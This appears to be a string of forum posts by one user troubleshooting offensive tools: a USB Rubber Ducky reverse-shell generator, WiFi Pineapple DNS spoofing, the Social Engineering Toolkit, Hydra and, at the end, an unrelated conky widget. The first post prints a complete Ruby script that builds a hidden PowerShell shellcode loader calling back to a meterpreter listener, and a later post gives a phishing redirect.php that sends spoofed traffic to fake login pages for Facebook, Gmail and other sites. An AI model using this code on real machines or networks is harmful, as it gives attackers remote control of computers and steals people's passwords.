SystemCrash86

Ducky reverse shell doesn't work I have used the following script, that i know used to work and now doesn't. I modified it abit from the original download to hide the cmd window as the shellcode is being typed. It worked like a charm but now its not working. Here is the script: #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def get_host() host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1] ip = host_name.split('.') if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil print_error("Not a valid IP\n") get_host() end print_success("Using #{host_name} as server\n") return host_name end def get_port() port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1] if port == '' port = '443' print_success("Using #{port}\n") return port elsif not (1..65535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) port() else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path,host,port) print_info("Generating shellcode\n") execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C` shellcode = clean_shellcode(execute) powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}) encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n") return encoded_command end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\',",0") shellcode = shellcode.delete("+") shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..4] = '' return shellcode end def ducky_setup(encoded_command) print_info("Writing to file\n") File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")} print_success("File Complete\n") end def metasploit_setup(msf_path,host,port) print_info("Setting up Metasploit this may take a moment\n") rc_file = "msf_listener.rc" file = File.open("#{rc_file}",'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write("exploit -j") file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?("/opt/metasploit-framework/msfvenom") msf_path = ('/opt/metasploit-framework/') else print_error("Metasploit Not Found!") exit end @set_payload = "windows/meterpreter/reverse_tcp" host = get_host() port = get_port() encoded_command = shellcode_gen(msf_path,host,port) ducky_setup(encoded_command) msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1] print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path,host,port) if msf_setup == 'yes' print_info("Good Bye!\n") end And i get the following error: root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb [!] Enter the host ip to listen on: 192.168.0.2 [+] Using 192.168.0.2 as server [!] Enter the port you would like to use or leave blank for [443]: 443 [+] Using 443 [*] Generating shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 0 compatible encoders ./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode' from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen' from ./reverse_powershell_ducky2.rb:90:in `<main>' root@SystemCrash86:/usr/share/simple-ducky/payloads# Everything is uptodate and this script used to work but now i get those errors

In my karma log i only have one connected client appear at any one time then dissappear, but the client is still connected

I too am experiencing this and i would like to know if this is normal

Yes its a mark 5 with two antennia's and i am able to turn on the wlan1 interface using the wifi manager infusion. I then ssh'd into the pineapple and issued the iwconfig command: root@Pineapple:~# iwconfig lo no wireless extensions. wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm RTS thr:off Fragment thr:off Encryption key:off Power Management:off wlan0 IEEE 802.11bgn Mode:Master Tx-Power=18 dBm RTS thr:off Fragment thr:off Power Management:off eth0 no wireless extensions. br-lan no wireless extensions.

Yes its the new mark 5 pineapple. My interface between pineapple and laptop is eth0 and my interface between laptop and internet is wlan0. I didnt think i would get a wlan1 interface until i plugged in another wifi adapter like my alfa - was i wrong?

oh yeah i forgot that, my mistake sorry I ssh'd into the pineapple and typed if config: root@Pineapple:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:13:37:A5:08:3A inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3573 errors:0 dropped:846 overruns:0 frame:0 TX packets:2194 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:565512 (552.2 KiB) TX bytes:262303 (256.1 KiB) eth0 Link encap:Ethernet HWaddr 00:13:37:A5:08:3A UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3789 errors:0 dropped:68 overruns:0 frame:0 TX packets:2191 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:654908 (639.5 KiB) TX bytes:262121 (255.9 KiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:658 errors:0 dropped:0 overruns:0 frame:0 TX packets:658 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:71448 (69.7 KiB) TX bytes:71448 (69.7 KiB) wlan0 Link encap:Ethernet HWaddr 00:13:37:A5:08:3A UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:2265 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:523303 (511.0 KiB)

Oh right sorry, where would i find that? I'm quite new to the pineapple

In Kali linux with my pineapple attached ifconfig is: root@SystemCrash86:~# ifconfig eth0 Link encap:Ethernet HWaddr 40:61:86:b6:42:58 inet addr:172.16.42.42 Bcast:172.16.42.255 Mask:255.255.255.0 inet6 addr: fe80::4261:86ff:feb6:4258/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:31062 errors:0 dropped:6 overruns:0 frame:0 TX packets:38866 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3641875 (3.4 MiB) TX bytes:24519611 (23.3 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:89317 errors:0 dropped:0 overruns:0 frame:0 TX packets:89317 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:14934572 (14.2 MiB) TX bytes:14934572 (14.2 MiB) wlan0 Link encap:Ethernet HWaddr 6c:62:6d:12:0a:c4 inet addr:192.168.1.65 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::6e62:6dff:fe12:ac4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:21563 errors:0 dropped:0 overruns:0 frame:0 TX packets:15870 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:23393743 (22.3 MiB) TX bytes:1686932 (1.6 MiB) root@SystemCrash86:~#

UPDATE Ok after trying to fix this with no success I went on my laptop and booted up Kali Linux and connected the pineapple to it. Then in Kali Linux I opened up a virtual machine of windows xp - unpatched, its what I use test with in Kali Linux. I turned on DNS Spoof on the pineapple expecting to have no effect like before and I loaded up internet explorer in my unpatched windows xp machine. For some reason I cant explain it worked - I don’t know how it work but it did. Why would it work in my unpatched windows xp virtual machine and nowhere else. My other operating systems include windows 7 and ubuntu 13.10 both fully patched and running the latest firefox browser and it doesn’t work

I am connected on my desktop on the new wifi pineapples mark 5 wifi - the mark 5 is connected to my laptop. DNS Spoof isn't working (I previously made a thread about this but got moved over here). If you read my last thread i mentioned that all i changed on this new mark 5 was the redirect.php which i had done and used the the mark 4 without any problems. I also checked the spoofhost for any extra characters and there is none. While connected to the pineapples wifi i can surf the web without any issue whatsoever, dnsspoof is turned on but does not redirect pages. Opening up a terminal and pinging a non-spoofed website says: systemcrash86@SystemCrash86:~$ ping www.google.com PING www.google.com (31.55.167.217) 56(84) bytes of data. 64 bytes from 31.55.167.217: icmp_seq=1 ttl=57 time=23.9 ms From 172.16.42.1: icmp_seq=2 Redirect Host(New nexthop: 172.16.42.42) From 172.16.42.1 icmp_seq=2 Redirect Host64 bytes from 31.55.167.217: icmp_seq=2 ttl=57 time=22.5 ms From 172.16.42.1 icmp_seq=3 Redirect HostFrom 172.16.42.1: icmp_seq=3 Redirect Host(New nexthop: 172.16.42.42) From 172.16.42.1 icmp_seq=4 Redirect Host64 bytes from 31.55.167.217: icmp_seq=3 ttl=57 time=22.5 ms From 172.16.42.1 icmp_seq=5 Redirect HostFrom Pineapple.lan (172.16.42.1): icmp_seq=4 Redirect Host(New nexthop: 172.16.42.42) From 172.16.42.1 icmp_seq=6 Redirect Host64 bytes from 31.55.167.217: icmp_seq=4 ttl=57 time=22.6 ms From 172.16.42.1 icmp_seq=7 Redirect HostFrom 172.16.42.1: icmp_seq=5 Redirect Host(New nexthop: 172.16.42.42) ^CFrom 172.16.42.1 icmp_seq=8 Redirect Host --- www.google.com ping statistics --- 8 packets transmitted, 4 received, +7 errors, 50% packet loss, time 75279ms rtt min/avg/max/mdev = 22.543/22.929/23.974/0.632 ms, pipe 4 systemcrash86@SystemCrash86:~$ While pinging a spoofed website for example facebook says: systemcrash86@SystemCrash86:~$ ping www.facebook.com PING star.c10r.facebook.com (31.13.80.33) 56(84) bytes of data. 64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=1 ttl=82 time=38.6 ms From 172.16.42.1: icmp_seq=2 Redirect Host(New nexthop: 172.16.42.42) From 172.16.42.1 icmp_seq=2 Redirect Host64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=2 ttl=82 time=37.3 ms From 172.16.42.1 icmp_seq=3 Redirect HostFrom 172.16.42.1: icmp_seq=3 Redirect Host(New nexthop: 172.16.42.42) From 172.16.42.1 icmp_seq=4 Redirect Host64 bytes from edge-star-shv-03-cdg1.facebook.com (31.13.80.33): icmp_seq=3 ttl=82 time=37.4 ms From 172.16.42.1 icmp_seq=5 Redirect HostFrom 172.16.42.1: icmp_seq=4 Redirect Host(New nexthop: 172.16.42.42) ^CFrom 172.16.42.1 icmp_seq=6 Redirect Host --- star.c10r.facebook.com ping statistics --- 6 packets transmitted, 3 received, +5 errors, 50% packet loss, time 41155ms rtt min/avg/max/mdev = 37.374/37.814/38.660/0.638 ms, pipe 3 systemcrash86@SystemCrash86:~$ I am stuck, i have no idea how to fix this

After i couldn't find anything in the www folder i looked at the /etc/pineapple/spoofhost file and found nothing except the hosts i want to dnsspoof, no extra characters or anything. I'm very confused

I SSH'd into the pineapple and went to the www folder and checked the index.php file and other files in that folder and still nothing - did i miss something?

I had a look at the Configuration Tile and DNS Spoof Tab and the Hosts or index.php have no extra characters at all - not even the ^M and the same thing in the dnsspoof infusion and all i changed was my redirect.php thats it thats all i changed and when i start dns spoof - either from the configuration tile or the actual dns spoof tile i get no errors at all. On my other pc i browse to the spoofed site e.g facebook, twitter and the actual site loads. I haven't seen any extra characters

<?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "hotmail")){ header('Status: 302 Found'); header('Location: hotmail.htm'); } if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebook.htm'); } if (strpos($ref, "twitter")){ header('Status: 302 Found'); header('Location: twitter.htm'); } if (strpos($ref, "gmail")){ header('Status: 302 Found'); header('Location: gmail.htm'); } if (strpos($ref, "youtube")){ header('Status: 302 Found'); header('Location: youtube.htm'); } if (strpos($ref, "vimeo")){ header('Status: 302 Found'); header('Location: vimeo.htm'); } if (strpos($ref, "linkedin")){ header('Status: 302 Found'); header('Location: linkedin.htm'); } if (strpos($ref, "instagram")){ header('Status: 302 Found'); header('Location: instagram.html'); } if (strpos($ref, "plus.google")){ header('Status: 302 Found'); header('Location: googleplus.htm'); } if (strpos($ref, "netflix")){ header('Status: 302 Found'); header('Location: netflix.htm'); } if (strpos($ref, "ustream")){ header('Status: 302 Found'); header('Location: ustream.htm'); } if (strpos($ref, "dropbox")){ header('Status: 302 Found'); header('Location: dropbox.htm'); } if (strpos($ref, "blogger")){ header('Status: 302 Found'); header('Location: blogger.htm'); } if (strpos($ref, "outlook")){ header('Status: 302 Found'); header('Location: outlook.htm'); } require('error.php'); ?> <iframe style="display:none;" src="/get/get.php"></iframe> This is my redirect.php - the only thing i changed, the error.php and the index.php remain untouched. It worked for my mark 4 so i assumed it would work for my mark 5 - was that an error on my part?

I got the new wifi pineapple mark 5 and everything works great, except for the dnsspoof - it just doesn't work at all. Is this a common issue with the new pineapple or is it just me and is there a possible fix?

Sorry my bad, i found a solution. Sorry i didnt mean to waste anyones time I dont have permission to delete this thread so if one of the admins on here sees this then could you do so

I am using kali linux and i installed the simple ducky script with no errors. Through the process it updated my java jdk from version 6 to 7 -again it showed me no errors. However when i do apt-get upgrade from my kali terminal i get a bunch of errors: root@SystemCrash86:~# apt-get upgrade Reading package lists... Done Building dependency tree Reading state information... Done The following packages will be upgraded: icedtea-netx icedtea-netx-common 2 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 876 kB of archives. After this operation, 0 B of additional disk space will be used. Do you want to continue [Y/n]? y Err http://security.kali.org/kali-security/ kali/updates/main icedtea-netx-common all 1.4-3~deb7u2 Could not connect to archive-5.kali.org:80 (50.7.97.58). - connect (111: Connection refused) Err http://security.kali.org/kali-security/ kali/updates/main icedtea-netx amd64 1.4-3~deb7u2 Unable to connect to archive-5.kali.org:http: Failed to fetch Failed to fetch E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing? I get this everytime, ever since i installed this script, anyone got any ideas?

Just two questions about the lastest release of the update pineapple firmware to 3.0.0. I like the new interface and realise that painstaking time and hard work went into and it shows so keep up the great work guys. My first question would be - with this new interface where is the dnsspoof log and the phishing logs located? In the old interface they were under the logs tab but not sure where they are now. I recently upgraded and wanted to try it out so i upgraded and install some infusions on usb with no errors or problems and i set to laptops up one with windows and internet explorer and the other one is my usualy Kali linux machine which the pineapple is connected. I started dnsspoof on the pineapple and on my windows machine i navigated to facebook, twitter etc all of which loaded up no problem so i entered in my lamepassword and again no errors. So i'm just wondering where these logs are in the new pineapple interface. Also i can scp into the pineapple but still cant locate them. And am not sure if my second question has been answered already, if it that then i apologize, my pineapple log file is being cluttered by this: "Pineapple user.notice root: Mobile.Keepalive: Still Redialing..." does some one know how to sort this out as its filling up my log file very rapidly?

I know, thats why i thought i would try here and not bother him. I sent one email thats enough, hes very busy with other things like you said, derbycon. I was hoping someone on here might have an answer

Sent an email but havent got reply, he is very busy. How would i simplify my testing, i have done the bare minimum to make it work. I get now errors or anything its just that the email created in SET only sends the first line off the email to my account and i'm not sure how to edit the python scripts to make it work

Can somebody help my figure out why the latest version of the Social Engineering Toolkit (SET) will not send the full email. When using credential harvester and webattack turned on in the config file, you get prompted to send an email - however SET only sends the first line of the email and thats it. Hope somebody can help

After having made the switch from Backtrack 5 to Kali i thought i would give hydra a try. So i put my password in the middle of my password list and ran it. However it threw up some errors about my password list being too long - huh? i dont get it and yet if i run the same command with a much much shorter password list i have no problems. root@SystemCrash86:~# hydra -Vv -l "myemail@hotmail.co.uk -P password.lst pop3.live.com pop3 Hydra v7.4.2 ©2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2013-07-29 17:04:27 [ERROR] Maximum number of passwords is 50000000, this file has 1195353094 entries. Can someone help as i dont how this happens ans beside isn't a bigger password list preferrable but yet i can't use it with hydra

Is there something wrong with the wp4.sh script because i can no longer get hold of it using wget wifipineapple.com/wp4.sh? Its just not there anymore

as an update, i also tried to use the terminal to run conky as well and it showed a few errors that i have no idea how to fix christopher@christopher-OEM:~$ conky -c /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 281: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 282: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 283: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 288: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 289: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 294: no such configuration: '${voffset' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 295: no such configuration: '${voffset' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 301: no such configuration: '${voffset' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 302: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 309: no such configuration: '${color1}${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 310: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 311: no such configuration: '${voffset' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 312: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 317: no such configuration: '${voffset' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 318: no such configuration: '${goto' Conky: /home/christopher/conky-manager/themes/conky_redqueen/config/conkyrc: 323: no such configuration: '${image' Conky: missing text block in configuration; exiting ***** Imlib2 Developer Warning ***** : This program is calling the Imlib call: imlib_context_free(); With the parameter: context being NULL. Please fix your program. christopher@christopher-OEM:~$

I did that and it didn't work, i changed it then i rebooted and nothing. I have conky manager and its set to run at boot and it works for the other two widgets just not this one. I made the script executable and place it in Startup Applications and still nothing. It still doesnt load on boot